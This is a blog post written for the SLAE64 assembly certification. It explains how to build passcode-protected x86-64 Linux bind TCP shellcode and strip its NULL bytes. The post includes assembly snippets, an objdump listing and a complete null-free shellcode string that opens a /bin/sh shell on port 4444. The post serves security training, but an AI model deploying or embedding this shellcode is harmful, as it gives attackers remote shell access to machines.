SLAE64 - Bind TCP shellcode

The first assignment of the SLAE64 exam states:

Create a Shell_Bind_TCP shellcode:
- Binds to a port
- Needs a “passcode”
- If passcode is correct then execute a shell
Remove 0x00 from the Bind TCP shellcode discussed in the course

Shell Bind TCP shellcode⌗

The first assignment is to create a shell bind TCP shellcode which requires a passcode to spawn a shell. What happens when a wrong password is entered isn’t defined so I’ll just exit with a non-zero return code.

It follows this basic pattern to spawn a shell:

Allocate a file descriptor through socket(2)
Set up the structure defining the address family, address and port to listen to
Bind the socket with the above parameters
Listen on the socket for incoming connections
Upon accepting a connection perform the needed steps with to duplicate file descriptors for input/output
Print a password prompt and require the correct password to be entered
If the password was correct a shell is spawn; otherwise it exits

If this was regular assembly and not shellcode where size is a constraint it would be a good habit to check the return code of the syscalls. Most of them return a negative value upon failure, so we can test for a value less than 0 (set in R13 in the example below) and jump to the out label which will call exit with a non-zero return code to indicate a failure. For example:

    [...]
    syscall
    xor r13, r13
    cmp rax, r13
    jl out

out:
    mov rax, 60
    mov rdi, 1
    syscall

However this adds a fair amount of code (8 bytes) for every syscall. So for the sake of this exercise ignore any errors and hope the system doesn’t throw us any errors.

The passcode handling relies on a simple cmp instruction and whether it sets the zero flag or not. This works as cmp subtracts the operands and if they were equal the end result is zero, thus ZF ends up getting set. This means the data we read is equal to the string we stored previously in RBX.

For me the difficulty in this assignment was to correctly lay out the required structs on the stack without introducing any NULL bytes. The prime example of this is setting up struct sockaddr for the bind(2) syscall. First off, we need to construct the struct (pun intended) in reverse order as we’re dealing with the stack. So start by pushing 8 bytes of 0 for sin_zero:

    xor rax, rax
    push rax

Now here comes the key, push another 8 bytes of zero. This ensures the stack space we need is essentially zeroed out for future additions to the stack to rely upon:

    push rax                    ; Another 8 bytes worth of zero.
                                ; Half of it is for sin_addr.s_addr.
    mov word [rsp+2], 0x5c11    ; Push our port number (4444) onto the stack
    mov byte [rsp], 0x2         ; AF_INET = 2

In the end I decided to add an enter password: prompt as well. Since that strings exceeds 8 bytes it had to be pushed onto the stack using two mov/push operations.

The total size of this shellcode is 251 bytes.

Removing 0x00 from the discussed shellcode⌗

The original shellcode contains a fair number of NULLs according to objdump:

$ objdump -D -M intel BindShell.o

BindShell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:   b8 29 00 00 00          mov    eax,0x29
   5:   bf 02 00 00 00          mov    edi,0x2
   a:   be 01 00 00 00          mov    esi,0x1
   f:   ba 00 00 00 00          mov    edx,0x0
  14:   0f 05                   syscall
  16:   48 89 c7                mov    rdi,rax
  19:   48 31 c0                xor    rax,rax
  1c:   50                      push   rax
  1d:   89 44 24 fc             mov    DWORD PTR [rsp-0x4],eax
  21:   66 c7 44 24 fa 11 5c    mov    WORD PTR [rsp-0x6],0x5c11
  28:   66 c7 44 24 f8 02 00    mov    WORD PTR [rsp-0x8],0x2
  2f:   48 83 ec 08             sub    rsp,0x8
  33:   b8 31 00 00 00          mov    eax,0x31
  38:   48 89 e6                mov    rsi,rsp
  3b:   ba 10 00 00 00          mov    edx,0x10
  40:   0f 05                   syscall
  42:   b8 32 00 00 00          mov    eax,0x32
  47:   be 02 00 00 00          mov    esi,0x2
  4c:   0f 05                   syscall
  4e:   b8 2b 00 00 00          mov    eax,0x2b
  53:   48 83 ec 10             sub    rsp,0x10
  57:   48 89 e6                mov    rsi,rsp
  5a:   c6 44 24 ff 10          mov    BYTE PTR [rsp-0x1],0x10
  5f:   48 83 ec 01             sub    rsp,0x1
  63:   48 89 e2                mov    rdx,rsp
  66:   0f 05                   syscall
  68:   49 89 c1                mov    r9,rax
  6b:   b8 03 00 00 00          mov    eax,0x3
  70:   0f 05                   syscall
  72:   4c 89 cf                mov    rdi,r9
  75:   b8 21 00 00 00          mov    eax,0x21
  7a:   be 00 00 00 00          mov    esi,0x0
  7f:   0f 05                   syscall
  81:   b8 21 00 00 00          mov    eax,0x21
  86:   be 01 00 00 00          mov    esi,0x1
  8b:   0f 05                   syscall
  8d:   b8 21 00 00 00          mov    eax,0x21
  92:   be 02 00 00 00          mov    esi,0x2
  97:   0f 05                   syscall
  99:   48 31 c0                xor    rax,rax
  9c:   50                      push   rax
  9d:   48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
  a4:   2f 73 68
  a7:   53                      push   rbx
  a8:   48 89 e7                mov    rdi,rsp
  ab:   50                      push   rax
  ac:   48 89 e2                mov    rdx,rsp
  af:   57                      push   rdi
  b0:   48 89 e6                mov    rsi,rsp
  b3:   48 83 c0 3b             add    rax,0x3b
  b7:   0f 05                   syscall

There are a few common patterns we can use to get rid of the NULLs. For example:

mov eax, 41

can also be expressed as:

xor rax, rax ; clear the rax register (effectively zeroing it)
add rax, 41  ; add 41 to 0

Instead of using the add instruction after clearing the register we could increment the register value if we need something small like 1 or 2.

Another methods is to subtract the register from itself:

sub rax, rax
add rax, 41

If we also optimize it for size we could take it one step further by using al which are the lower 8 bits of the 64 bit rax register:

04 29                   add    al,0x29

compared to:

48 83 c0 29             add    rax,0x29

Additionally, using the stack to push values to before popping them into the destination register is another method to get rid of NULLs and oftentimes decrease codesize too.

The end result for my clean BindShell_no_null.nasm is:

\x48\x31\xc0\x40\xb7\x02\x40\x88\xc6\x40\xfe\xc6\x88\xc2\x48\x83\xc0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x40\x88\xc6\xb0\x32\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x29\xc0\xfe\xc0\xfe\xc0\xfe\xc0\x0f\x05\x4c\x89\xcf\x48\x31\xc9\x88\xc8\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05

It is slightly larger than the original but I have used a variety of ways to zero out and increment registers without always having used a method that would generate the smallest amount of code per se.

Wrapping up⌗

I have uploaded my code to jasperla/slae64 on GitHub:

I have also uploaded a helper script I wrote to the repository which helped me in testing and validating the code throughout the course: compile.py (requires Python 3.6).

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. Student ID: SLAE64-1614